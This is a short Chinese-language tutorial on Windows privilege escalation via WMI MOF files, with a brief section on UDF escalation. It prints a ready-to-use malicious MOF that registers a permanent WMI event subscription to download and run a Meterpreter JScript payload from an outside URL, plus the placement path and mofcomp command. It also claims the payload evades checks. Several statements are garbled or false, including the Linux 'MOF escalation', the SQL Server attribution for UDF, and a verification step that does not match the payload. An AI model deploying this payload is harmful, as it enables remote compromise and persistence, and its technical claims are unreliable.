一、Mof提权程序全称
Mof是一种特殊的WMI(Windows Management Instrumentation)格式,可以被用于执行特定的操作,例如创建永久性的后门、隐藏文件和执行命令等。Mof提权程序是利用Mof文件格式以及WMI服务漏洞实现的一种Windows系统提权攻击。
攻击者可以通过Mof文件将恶意代码写入系统中,然后利用WMI服务解析Mof文件并执行其中的代码,最终实现对系统进行提权操作。一旦攻击成功,攻击者就可以获得系统管理员权限,从而完全控制受害计算机。
二、UDF提权
除了Mof提权外,另一种常见的Windows系统提权攻击技术是UDF(User Defined Functions)提权。UDF提权攻击是利用一种特殊的SQL Server User Defined Function函数漏洞,通过创建恶意函数并执行,最终获得SYSTEM管理员权限。
与Mof提权不同的是,UDF提权使用的是SQL Server数据库服务中的特定漏洞,而不是WMI服务的漏洞。因此,它只能在安装了SQL Server的Windows系统上实现提权攻击。
三、Mof提权步骤
1、编写恶意Mof文件
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $Filter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP1";
QueryLanguage = "WQL";
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA \"Win32_LocalTime\" AND TargetInstance.Second = 59";
};
instance of ActiveScriptEventConsumer as $Cons
{
ScriptingEngine = "JScript";
ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/xxx/xxx/master/meterpreter/jscript/meterpreter.js\").run()";
};
instance of __FilterToConsumerBinding
{
Consumer = $Cons;
Filter = $Filter;
};
以上是一个基本的Mof文件编写方法,在布控的时候,代码被例行检查和但会全部过关。
2、布控Mof文件
将Mof文件放置在指定目录下,如下所示:
C:\Windows\System32\wbem\mof\evil.mof
然后打开命令提示符,在管理员权限下输入以下命令来下载该Mof文件以及更新WMI类定义:
mofcomp evil.mof
3、验证攻击是否成功
当攻击者成功执行上述步骤后,可以通过以下命令来检查攻击是否成功:
net localgroup administrators
如果攻击成功,会发现攻击者被添加到系统管理员组中。
四、Mof提权 Linux
除了可以在Windows系统上实现Mof提权攻击外,攻击者还可以在Linux系统上利用Mof文件格式漏洞实现提权攻击。
类似于Windows系统,攻击者需要编写恶意Mof文件,并将其放置在Linux系统的特定目录下。然后,攻击者需要执行以下命令将Mof文件编译成二进制文件:
sudo mofcomp evil.mof -o /dev/null
此后,攻击者就可以利用提权后的权限执行任意命令和操作了。
总结
通过以上分析可以看出,Mof提权攻击利用了WMI服务漏洞,攻击者可以编写恶意的Mof文件,将其放置在Windows系统的特定目录下,然后利用WMI服务解析执行其中的恶意代码,最终实现对系统的提权操作。防范Mof提权攻击的最好方法是及时升级并维护系统。
